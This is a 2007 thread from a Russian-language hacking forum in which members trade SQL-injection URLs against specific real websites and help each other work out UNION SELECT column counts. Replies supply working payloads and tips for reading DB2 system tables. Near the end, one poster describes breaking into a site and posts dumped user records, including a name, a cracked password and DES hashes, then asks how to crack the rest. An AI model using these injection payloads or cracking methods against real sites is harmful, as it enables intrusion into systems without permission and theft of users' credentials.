ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
27.10.2007, 19:41
|
|
Новичок
Регистрация: 15.03.2007
Сообщений: 5
Провел на форуме:
48930
Репутация:
0
|
|
Помогите пожалуйста никак не могу подобрать количество полей.
Пробовал и order by и group by и вручную дошел до 43 ничего не получается???
Код HTML:
http://www.radiocomponent.net/prices.php?companyPK=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+companies+limit+0,1/*
Последний раз редактировалось Hood; 27.10.2007 в 19:45..
|
|
|
30.10.2007, 00:18
|
|
Познающий
Регистрация: 25.09.2007
Сообщений: 42
Провел на форуме:
217723
Репутация:
22
|
|
ht_tp://www.skautai.lt/users.php?id=1)+order+by+1/*
помогите найти inj плз
|
|
|
|
30.10.2007, 02:19
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343
Репутация:
141
|
|
http://sirius.ldz.lv/sari/saraksts.asp?lngg=xek
Возможно что-то вывести?
|
|
|
|
30.10.2007, 08:27
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Хех, тут инъекция в select как я понял, это значит надо еще таблицу подбирать
вот пример того как:
Код:
http://sirius.ldz.lv/sari/saraksts.asp?lngg=lv%20from%20table1--
если подобрать это, то можно нарыть че нить например из системных таблиц sysibm можно узнать версию, пользователя и название базы, также после подбора можно будет узнать таблицы и колонки и соответственно вывести какуюто инфу из этого всего
ЗЫ я в DB2 неочень, так что поправьте меня если я неправ
ЗЗЫ Можно наверное и из других скриптов что то узнать, но меня самого именно этот вариант заинтересовал, т.к. инъекцию в Select я первый раз увидел
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 30.10.2007 в 08:31..
|
|
|
|
30.10.2007, 19:03
|
|
Новичок
Регистрация: 27.10.2007
Сообщений: 2
Провел на форуме:
15757
Репутация:
0
|
|
вот кажется нашёл sql инекцию http://epood.atf.ee/index.php?categoryID=402' пробовал подобрать поля,перебрал 50 полей , но ничего не получилось подскажите что не так сделал и есть ли там вообще инекция?
п.с. подбирал:id=9999+union+select+null,null,nu ll......../* и так далее
|
|
|
|
30.10.2007, 19:16
|
|
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499
Репутация:
807
|
|
http://epood.atf.ee/index.php?categoryID=-402+order+by+1/*
http://epood.atf.ee/index.php?categoryID=-402+union+select+1/*
смотреть вывод в коде страницы.
Последний раз редактировалось freddi; 30.10.2007 в 19:26..
|
|
|
|
02.11.2007, 11:48
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
Подскажите что можно сделать с этой скулей
код:
http://forum.tomsk.ru/forum.php?a=9&g=34+order+by+9/*&t=713344
при запросе юнион селект кидает на главную страницу
|
|
|
|
04.11.2007, 01:19
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
2 fobofob
На том же сайте вот тут http://forum.tomsk.ru/forum.php?a=24&user_id=-1357+union+select+111,222,3,4,555,666,7,8,9,10/*
такой проблемы нету.
Надеюсь помог  |
|
|
|
04.11.2007, 16:42
|
|
Новичок
Регистрация: 28.10.2007
Сообщений: 11
Провел на форуме:
86145
Репутация:
12
|
|
Т.к. я начинающий, то в процессе обучения возник вопрос
Вскрыл сайт с SI, добыл следующую инфу:
таблица 1:
access_code,firstname,lastname,password
123800876,Adam,Smith,bigdog (из MD5)
таблица 2:
name,is_superuser,api_password,password
Adam Smith,1,NhaXbNfmzppAE,fsH1sRBI6rLuQ
С первой таблицей все ясно - ее данные подходят к входу на форум, но не подходят к админке  Не могу понять, к чему относятся данные из второй таблицы. Особенно интересуют поля api_password и password. Вопрос: хешированы они или нет? Если хешированы, то чем можно их забрутить? Что такое access_code? И последний вопрос - к чему могут относиться данные из второй таблицы?
Доп.инфа: в первой таблице юзверей более 2 тысяч, во второй - пяток. |
|
|
|
04.11.2007, 17:07
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Это DES (13 симв)... password- это понятно (хотя несовсем)... api_password - возможно это
admin panel interface тоесть админка... password-это допустим доступ к сайту, api_password - это пароль доступа в админку...
может быть api_password - это ключ шифрования DES-хеша, а password - это зашифрованный ключем api_password хеш пароля
хотя врядли все так сложно, т.ч. скорей всего первый вариант
__________________
Карфаген должен быть разрушен...
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид